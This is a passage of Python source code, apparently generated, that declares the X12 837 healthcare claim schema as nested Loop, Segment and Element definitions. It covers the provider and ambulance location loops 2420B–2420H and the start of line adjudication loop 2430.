"1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="S", seq="04" ), 
Element( "REF04-01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=0, codes=["2U"], ), ), Element( "REF04-02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=1, codes=[], ), ), Element( "REF04-03", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "REF04-04", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "REF04-05", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "REF04-06", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=5, codes=[], ), ), ), ), ) parsed_837_2420B = Loop( "2420B", Properties( desc="Purchased Service Provider Name", looptype="", position="5000", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Purchased Service Provider Name", position="5000", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["QB"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1", "2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", 
"10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=8, codes=["XX"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "REF", Properties( desc="Purchased Service Provider Secondary Identification", position="5250", repeat="20", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="S", seq="04" ), Element( "REF04-01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=0, codes=["2U"], ), ), Element( "REF04-02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=1, codes=[], ), ), Element( "REF04-03", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "REF04-04", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "REF04-05", Properties( desc="Reference 
Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "REF04-06", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=5, codes=[], ), ), ), ), ) parsed_837_2420C = Loop( "2420C", Properties( desc="Service Facility Location Name", looptype="", position="5000", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Service Facility Location Name", position="5000", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["77"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=8, codes=["XX"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or 
Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Service Facility Location Address", position="5140", repeat="1", req_sit="R", syntax="", ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Service Facility Location City, State, ZIP Code", position="5200", repeat="1", req_sit="R", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), Segment( "REF", Properties( desc="Service Facility Location Secondary Identification", position="5250", repeat="3", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["G2", "LU"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", 
data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="S", seq="04" ), Element( "REF04-01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=0, codes=["2U"], ), ), Element( "REF04-02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=1, codes=[], ), ), Element( "REF04-03", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "REF04-04", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "REF04-05", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "REF04-06", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=5, codes=[], ), ), ), ), ) parsed_837_2420D = Loop( "2420D", Properties( desc="Supervising Provider Name", looptype="", position="5000", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Supervising Provider Name", position="5000", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["DQ"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="S", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="S", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", 
data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="S", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=8, codes=["XX"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "REF", Properties( desc="Supervising Provider Secondary Identification", position="5250", repeat="20", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2", "LU"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="S", seq="04" ), Element( "REF04-01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=0, codes=["2U"], ), ), Element( "REF04-02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=1, codes=[], ), ), Element( "REF04-03", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "REF04-04", Properties( desc="Reference 
Identification", req_sit="N", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "REF04-05", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "REF04-06", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=5, codes=[], ), ), ), ), ) parsed_837_2420E = Loop( "2420E", Properties( desc="Ordering Provider Name", looptype="", position="5000", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Ordering Provider Name", position="5000", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["DK"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="S", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="S", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="S", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=8, codes=["XX"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", 
req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Ordering Provider Address", position="5140", repeat="1", req_sit="S", syntax="", ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Ordering Provider City, State, ZIP Code", position="5200", repeat="1", req_sit="S", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), Segment( "REF", Properties( desc="Ordering Provider Secondary Identification", position="5250", repeat="20", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", 
"1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="S", seq="04" ), Element( "REF04-01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=0, codes=["2U"], ), ), Element( "REF04-02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=1, codes=[], ), ), Element( "REF04-03", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "REF04-04", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "REF04-05", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "REF04-06", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=5, codes=[], ), ), ), ), Segment( "PER", Properties( desc="Ordering Provider Contact Information", position="5300", repeat="1", req_sit="S", syntax="P0304 P0506 P0708", ), Element( "PER01", Properties( desc="Contact Function Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["IC"], ), ), Element( "PER02", Properties( desc="Name", req_sit="S", data_type=("AN", "1", "60"), position=2, codes=[], ), ), Element( "PER03", Properties( desc="Communication Number Qualifier", req_sit="R", data_type=("ID", "2", "2"), position=3, codes=["EM", "FX", "TE"], ), ), Element( "PER04", Properties( desc="Communication Number", req_sit="R", data_type=("AN", "1", "256"), position=4, codes=[], ), ), Element( "PER05", Properties( desc="Communication Number Qualifier", req_sit="S", data_type=("ID", "2", "2"), position=5, codes=["EM", "EX", "FX", "TE"], ), ), Element( "PER06", Properties( 
desc="Communication Number", req_sit="S", data_type=("AN", "1", "256"), position=6, codes=[], ), ), Element( "PER07", Properties( desc="Communication Number Qualifier", req_sit="S", data_type=("ID", "2", "2"), position=7, codes=["EM", "EX", "FX", "TE"], ), ), Element( "PER08", Properties( desc="Communication Number", req_sit="S", data_type=("AN", "1", "256"), position=8, codes=[], ), ), Element( "PER09", Properties( desc="Contact Inquiry Reference", req_sit="N", data_type=("AN", "1", "20"), position=9, codes=[], ), ), ), ) parsed_837_2420F = Loop( "2420F", Properties( desc="Referring Provider Name", looptype="", position="5000", repeat="2", req_sit="S", ), Segment( "NM1", Properties( desc="Referring Provider Name", position="5000", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["DN", "P3"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="S", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="S", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="S", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=8, codes=["XX"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity 
Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "REF", Properties( desc="Referring Provider Secondary Identification", position="5250", repeat="20", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="S", seq="04" ), Element( "REF04-01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=0, codes=["2U"], ), ), Element( "REF04-02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=1, codes=[], ), ), Element( "REF04-03", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "REF04-04", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "REF04-05", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "REF04-06", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=5, codes=[], ), ), ), ), ) parsed_837_2420G = Loop( "2420G", Properties( desc="Ambulance Pick-up Location", looptype="", position="5310", 
repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Ambulance Pick-up Location", position="5000", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["PW"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Ambulance Pick-up Location Address", position="5140", repeat="1", req_sit="R", syntax="", ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", 
Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Ambulance Pick-up Location City, State, ZIP Code", position="5200", repeat="1", req_sit="R", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), ) parsed_837_2420H = Loop( "2420H", Properties( desc="Ambulance Drop-off Location", looptype="", position="5380", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Ambulance Drop-off Location", position="5000", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["45"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="S", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", 
req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Ambulance Drop-off Location Address", position="5140", repeat="1", req_sit="R", syntax="", ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Ambulance Drop-off Location City, State, ZIP Code", position="5200", repeat="1", req_sit="R", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, 
codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), ) parsed_837_2430 = Loop( "2430", Properties( desc="Line Adjudication Information", looptype="", position="5400", repeat="15", req_sit="S", ), Segment( "SVD", Properties( desc="Line Adjudication Information", position="5400", repeat="1", req_sit="R", syntax="", ), Element( "SVD01", Properties( desc="Identification Code", req_sit="R", data_type=("AN", "2", "80"), position=1, codes=[], ), ), Element( "SVD02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Composite( "C003", Properties( desc="Composite Medical Procedure Identifier", refdes="", repeat="", req_sit="R", seq="03", ), Element( "SVD03-01", Properties( desc="Product/Service ID Qualifier", req_sit="R", data_type=("ID", "2", "2"), position=0, codes=["ER", "HC", "IV", "WK"], ), ), Element( "SVD03-02", Properties( desc="Product/Service ID", req_sit="R", data_type=("AN", "1", "48"), position=1, codes=[], ), ), Element( "SVD03-03", Properties( desc="Procedure Modifier", req_sit="S", data_type=("AN", "2", "2"), position=2, codes=[], ), ), Element( "SVD03-04", Properties( desc="Procedure Modifier", req_sit="S", data_type=("AN", "2", "2"), position=3, codes=[], ), ), Element( "SVD03-05", Properties( desc="Procedure Modifier", req_sit="S", data_type=("AN", "2", "2"), position=4, codes=[], ), ), Element( "SVD03-06", Properties( desc="Procedure Modifier", req_sit="S", data_type=("AN", "2", "2"), position=5, codes=[], ), ), Element( "SVD03-07", Properties( desc="Description", req_sit="S", data_type=("AN", "1", "80"), position=6, codes=[], ), ), Element( "SVD03-08", 
Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=7, codes=[], ), ), ), Element( "SVD04", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=4, codes=[], ), ), Element( "SVD05", Properties( desc="Quantity", req_sit="R", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "SVD06", Properties( desc="Assigned Number", req_sit="S", data_type=("N0", "1", "6"), position=6, codes=[], ), ), ), Segment( "CAS", Properties( desc="Line Adjustment", position="5450", repeat="5", req_sit="S", syntax="L050607 C0605 C0705 L080910 C0908 C1008 L111213 C1211 C1311 L141516 C1514 C1614 L171819 C1817 C1917", ), Element( "CAS01", Properties( desc="Claim Adjustment Group Code", req_sit="R", data_type=("ID", "1", "2"), position=1, codes=["CO", "CR", "OA", "PI", "PR"], ), ), Element( "CAS02", Properties( desc="Claim Adjustment Reason Code", req_sit="R", data_type=("ID", "1", "5"), position=2, codes=[], ), ), Element( "CAS03", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=3, codes=[], ), ), Element( "CAS04", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=4, codes=[], ), ), Element( "CAS05", Properties( desc="Claim Adjustment Reason Code", req_sit="S", data_type=("ID", "1", "5"), position=5, codes=[], ), ), Element( "CAS06", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=6, codes=[], ), ), Element( "CAS07", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=7, codes=[], ), ), Element( "CAS08", Properties( desc="Claim Adjustment Reason Code", req_sit="S", data_type=("ID", "1", "5"), position=8, codes=[], ), ), Element( "CAS09", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=9, codes=[], ), ), Element( "CAS10", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=10, codes=[], ), ), Element( "CAS11", 
